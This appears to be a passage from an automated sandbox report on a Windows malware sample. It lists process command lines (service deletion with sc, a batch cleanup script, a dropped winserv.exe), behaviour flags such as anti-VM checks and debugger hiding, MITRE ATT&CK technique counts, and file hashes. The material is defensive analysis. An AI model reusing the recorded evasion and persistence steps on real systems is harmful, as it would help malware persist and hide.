C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵PID:7116
-
C:\Windows\system32\sc.exesc delete crmsvc5⤵
- Launches sc.exe
PID:5180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\Del3.bat4⤵PID:7088
-
C:\Windows\system32\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:564
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:6560
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5372
-
C:\Windows\SysWOW64\unsecapp.exeC:\Windows\SysWOW64\unsecapp.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7040
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6664
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
Filesize
5.0MB
MD594f77784fc1a2301b7c1df7791075b79
SHA156f07c136df9d03e31cb4e4eb76d767bca68d34f
SHA256b65558311f535cc6fdde47a037406a705e7af4032bb5fcbd31463e9696ffbfa2
SHA51215054aebfb25f2b6670c20b9380ad060d56f27764c3f2ab5a15ea9c42cc5f0ad417d999d3f7789e961ca7c9a1175d6f4cc4ac7b95cb1f53cea1bc0824d98e30e
-
Filesize
44.8MB
MD555357571e2efb3b423a6cee1962a1a6e
SHA13bbc08a9fb2111f109c81a42e2bcfd8ee38f51a2
SHA256a2d45ffa329dad8f99da3f2918a2f968340bcc049052564a716972d86b230d1f
SHA512ab71d7e570bb71f0c6634de43cc12abcab8a609bda22aca17570ca0650de3b5886aed998c9989bfbb9cab69bda245d608347cf9bc36a794d6c084bb95e4fe336
-
Filesize
18.7MB
MD5cb97f88ef15f12226db62727c028f9a4
SHA1cb6d51176624afa444ab8c6df4961af70db32473
SHA2562f21ef3cd2b5d99d3c954ccbe66ca0176da7fac280fe4830b22860c669651788
SHA5127aeb1b0e66bdaf2ccdad0ca76756491a30cca334d11e0516df94a73129202fa522d72d60493c136170dd0ff3adb528885b0c36ce253b8eceac54004f420c4567
-
Filesize
6.2MB
MD5d5187ea3ea26e8aabcde330cb97afc6d
SHA1cb2fa53482b6c720f3966e1d4e2366ce9cbb4084
SHA2563c14c6c148eb1fdb4f54c8f3c9a3eaed6143c8b53d4ab26add6c607117a036e0
SHA5124c87e20e8c13bd390bbb01188a9e1bccad700216cfa3af27e99f5800933ab753750ed9edf07358d39e8964d928275fcd1a387e0f224db2832b93d8198ff72589
-
Filesize
2KB
MD5bc909d39981af556d07dc67178f61472
SHA1a4e5b1c5bc746435a5baf11b728e83fb8e654da0
SHA25610cf28ab39bf7ba76b91b043a007006d13d4a661fbcaad3d7820c19407b1e6a8
SHA512acf34884a865cdabfbb9a49b948ccc74fe1e158636b23e2f728c2df6fd2fb7bda0929eeddf4bf58d90b034215dafa5e2c697050c51c2f2259ff77fa02d80f51a
-
Filesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
Filesize
315B
MD572ee38ebb70f9f01e33fd62e454f635f
SHA195df0d6578e35145d37fcf1cf206b03d15d535c8
SHA25627f348e1860ca50b0010baf70f5ecca0ad854b26a0d6ee10cdfd4883d085cceb
SHA512e6186fb628950738ec36c95349ae194153dece4bdbc316570ef4d4402e553edf96f4ef47d7ac164c44ba65a989e5269c24a9be06305f4c60578bba1731db67ef
-
Filesize
269B
MD5c7712694f184577b409ffecac5f195b3
SHA18cb5c96eb46d67c4aa04dd3918305d7287353ac3
SHA256143c8af728c4a3b54e8f80db4155d4f88ac564b7866b81ef2b7f351aae6ca41c
SHA5125aae1ce60f37e049fdf78e8e11992cf7a1d80b64ee296681309530e02c8931a5163cacc8dc928ff263e93f12f9beacd9db59ab5beb7622449f6e4e1f2289aec2
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\F4EFE37A30D0F14C6AC03FF7949A51CBC2EBC649
Filesize13KB
MD51111fde11878fb6c93463101b876460c
SHA1ff4fbef957f972ec0f7428a02ecc48a08929aa3d
SHA25688374585baf9d2adfec08c01c61ddfaccf1416084e1594016789009df0fe5fe9
SHA512470da189e30cf38498e12e3220b56e8cd160bd09ee5a769c1c4b0f8e46d41d6d9723d826606097651f8d4cc7dbeeb568fdd54a43a8226b138ba84f4c8b8c89f0
-
Filesize
13.0MB
MD5f41ac8c7f6f7871848ddb6fb718a15bb
SHA1bce00d05c76d0a4eedbd76c2e87fc55c644edac0
SHA256d30a26d6f6676d700f86db8ff522cccfea285e1272f2dba210cf99c3b676a773
SHA51262316becb846b12396401fdb79c14ada97495abdd241fe4815c963d6ea315989bc6f283ff68c17cd90e5b62d3ea025770f4883b2b1f387d0dbe2d41a1c541ba6
-
Filesize
24.5MB
MD5f5032dd24b3504fc7ceb460f326747fb
SHA1d570dd2ef6fb61f8a3ea3abdae6218175165005b
SHA2560286d727aca5e1a5443396725d3998e9c4dc5cb133c1beb0c1e8f55a092e9da2
SHA51298933bf6c4f1ddafff2b82bc4337521737322a67f25e86516f22f4d66a3c312a46f48cff7cea3be9db2cf821afc1cd37e07ee97ef1b99a1810b6642d832686e0
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
8.0MB
MD5a01c5ecd6108350ae23d2cddf0e77c17
SHA1c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD568c97f958856c7d1f8155fbf555c8448
SHA12da1d154580ed9cdfd15540135ad1b00fc58b1ce
SHA25623443271ada07378737a8449d439766f61834ea51c9ada06ce5b79c4aed9787f
SHA5124687e8cce906d3dc712fb4337928520faccd5f35ba704180b717ac5f1115c8c6501634262fd17c993050922b4024c7f39718c0526c0813b5e906eb0978427130
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\b3df7a46-08fc-4c52-8ee4-c30850b4b7fb
Filesize10KB
MD5597718a362fab9aa145288a1acb3271b
SHA1ea127ec17bc3b3f77fb7e2f1d0c5167d4c1649b2
SHA256af2cb99454ba8413ddeda2574c9b37afd8287c133df5ae0992560dc5fa7cf36b
SHA512413ede29bd3384aeef3c2e088bc0fbeaaa6dcc23100b45bd86dfaa88665e3ef1d10ca4e1f33f1121d3e623bcbb415d4fd8ba1765922f64998d033fbbe2a8b5d0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\datareporting\glean\pending_pings\f3440814-77a2-4c43-96f4-a3bcb40ee7b7
Filesize746B
MD5a217583afbe85f2c17284d0fc5312c25
SHA1788a082e26fe59c72e849c22a5932abace78a7eb
SHA256c5ab0bae2380a4668c693935f5c7be1f7b02617a0ae8b5ade842a9d166bf2022
SHA51247d105f0197681ff8c38fa13dfa7fa95cbd1276fd0b95fabc22b2175307188ea2de11acf026fc254a52770c4aeb42862d31b375684e0679abda4972b89e74ead
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json
Filesize372B
MD58be33af717bb1b67fbd61c3f4b807e9e
SHA17cf17656d174d951957ff36810e874a134dd49e0
SHA256e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA5126125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
9KB
MD56307ed59043a44eb932836c08145d01b
SHA174e52f8a2dc409fe6db9128c4f0b90d4973c1247
SHA256101734a5f4f316e6a5fbdf31e8155b1647fb0706741497755b2f59ddb3d755d7
SHA5121f4725e6106e871b1caeeeda53ad638aff002c2b0c292ac20a2d68c464079b63cdfb7c3809111e8d8d738a4f24e48afdd1aded1574b98fa4d08661e00364b8a1
-
Filesize
7KB
MD516190a5e3562dfeb1624605f8e924364
SHA1cd22cdb821115db91183fc8b645d8fb11ade307e
SHA25601eb5f9b706384794419e9b374bc3d3ee7cb294bb6dcf9b443562f32118b69b4
SHA5120d6a076ac9a86c7fcff19c402158e3d521e9fd12f1c4094c5b55945e893f08169701c8857cf567913cf060d2ef0c8d789b4eed660857949e56e53ebdfdb57589
-
Filesize
6KB
MD5350444bb2c570ebcd587b33eec58fa3c
SHA198f9ceb9835bc1c31a2c74b7f4a1c873a82a7f5c
SHA2560f68dbbc5420370afa871049d25d99199ff1e69910f38b84108fbb0b303b444f
SHA512b633f145c31860082cd2932ee3e55974626e1fee8b50cd6737d56c5c84cd93af5e95a44fba4bba2208300cfeba03d30e0c461a96ebcc2daedb27dea7dd3218cb
-
Filesize
6KB
MD5dd961e2721bbb6e9cb536014a7e7a3f2
SHA126eac6068d67c19a5c98e49beb7f5f6f02f87d2c
SHA2561dcb5ab70e4e8a459c7f1e5fa118c479ac088acc695d27caa737cc2ba24246fe
SHA5127777a255ce6c68923561bc2fe40a6dff93e614996427c8d3f0e3c6e508b1bdd27057cb9a43f6032674144fcdc9f3520cb7c49e475b268fc3cadb104511b32a57
-
Filesize
6KB
MD51be94651f830ec79eccb771e4478ced8
SHA11fa1e6543fb6f6721b74baa56600ffbf5e2be645
SHA256548f1bf3f99e5ef6ab87700d64570d86a1c1809b9843c0ad354af1ab67da6af3
SHA51249b8cabbf4d5cdc1c0bec129e01a6004e05e30dcc7dcf3efa2863075270a3ba08693e8468baefdb124c296bc3aefa4a2e45f403b7739b2058d37338cefd6fa05
-
Filesize
6KB
MD5917a0c02b71e1658904a1df3f071dcb7
SHA13bf2797ea9af6e6a1219d4f4c0b4ba4fd31f4e3e
SHA256ae0e66ed326517f09653d40bb2355e6837f791e6a7f2d89d48a8dfdab787d20f
SHA51227221b6b0c4f24e9d3df538d1403b418e9ed819fd94a23e28e55ea11487aab1fa46eacbf4be5e306d633ffd30f5794834c7dcd4f7db5d29dec3bab515d53e827
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD56924a15bf9891b6a487910daeb721f05
SHA1c081671173360f63db3fcaf87f2e5483144514db
SHA256b9845966e77dee29cbe3cad3091a5ed935a66f2408aebe42bc144d9defb425a3
SHA512408b83dc4aa147088e1a744de4eee83ecf350cda304445ad7e5ba54ef5684a263b37d8fc43caeba3cc46a085847323d67c37bda1d811f45c413755253db157e6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
Filesize5KB
MD5354d829b66b296144619a6b375faea4a
SHA1b496e196caaf2e396725d438597434ea6ae9378b
SHA2564331fc771ed22ff08572bdf4e196f6fb192fc4a10aeac8babacdb9faac15aeec
SHA512e8012a3ce13ac18ee5c3db235211ef52ddade3cebc5966785a0b8e60fc4fd294db57c6bda768d55c7ef6a36a5b0b73c14ca1ef514bc2b3280a2893904e236efa
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore-backups\recovery.jsonlz4
Filesize5KB
MD540a0530eb9e6a2a29628fe21a2547c5f
SHA1866560cf48dc054136f58f146094b61d7340a404
SHA25621a4fee4e50471ad28ac72d604b23ff5dfaf9322a304c7e0df74316cf1a1904a
SHA512f5f106bda3163fe48b8a4a5c8f88a5082b74a5de11eece12c8cf2168427c62b47b1a35c26569f70f0e8e4aa94f148d35c4d6e268d65b6d5219ae1137241fcb3f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\sessionstore.jsonlz4
Filesize5KB
MD5c775d32d562ea17fb8a2b439e739a69d
SHA18cf4664d57f916ebf7ea35a9f486ff61a7d66e2d
SHA2567c1d575f5cddc40cd5ae9fe363986d25d68d48ce86e586abe5a46e93fd07910b
SHA512ac408089e865d9798bf01333eb0f5b841f71234286f9b4b9ed5882c4dcb824104f3a1c99622b32bc12bed96fad6207924166d395c6a4c8f5e8b89b70d2411e4e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4s2odj76.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize184KB
MD5b01efd0877d8bb4a5d754d6d5a5922cf
SHA16dfaecd4219afbb206185171c64c777e9c73ae21
SHA256ef1ebedd446ce18b79317f09953ff8a6069f92749188b45945567c315388aa90
SHA5126f5fce89b6dc7e6979fdb01493c0811bcd55cb945d7665cd9a23e93419a5aa28207b3f614461103f04b0406741e8020c35252fda5529e41e3e918e42fd89c086
-
Filesize
2.9MB
MD522f542575ba038b66f07c3b0f9655091
SHA179998a91f52d40407aeffcf8d3f0a186558b105c
SHA256cdcb245932330a14bf04f7012e2d9cba83f379cb86562450cc05d4a7ee7c8795
SHA51221f188d139f66fab2f0491fdd5f36f046c544be22cad167ca891ac700be7bebb6f7fc983bd960723a2c5c157c64f84a9f8e8ffdfd720268c81f899764adaaaf5
-
Filesize
304KB
MD5eb27ad5c8792310eb53975379f9e2760
SHA15eb4f85605b56b175b2b53edd2583371c713b086
SHA25657a1e25a9f57e5cdab2541722a479031532f40ab2d1d4e15648d7b2b0b3d300b
SHA51209fff66c3bb1ef68173a10511c63e2a4417b093297c7eaa58d38e4667fb700288b2fbfb8d5db284f7371ad2dfb8be4e947c6c141202b2dfeea478eebd6dc20fd
-
Filesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
Filesize
412KB
MD5abc716afe35c3bc14652c8d85d14eb84
SHA1ba1309103941f0c238e9f22cd9097e524a01a5fe
SHA256709267168ac2d07ae77bdf0116c56280368e1490a58fade20133418253092e16
SHA512230b1b47b66b5d16971de28e5e31670c82d4a7824f15d61fe80b4f0c5182db6df280a173bde07e4898ce36b703d0aed44a0633a4ca25b6703024566e51dda8be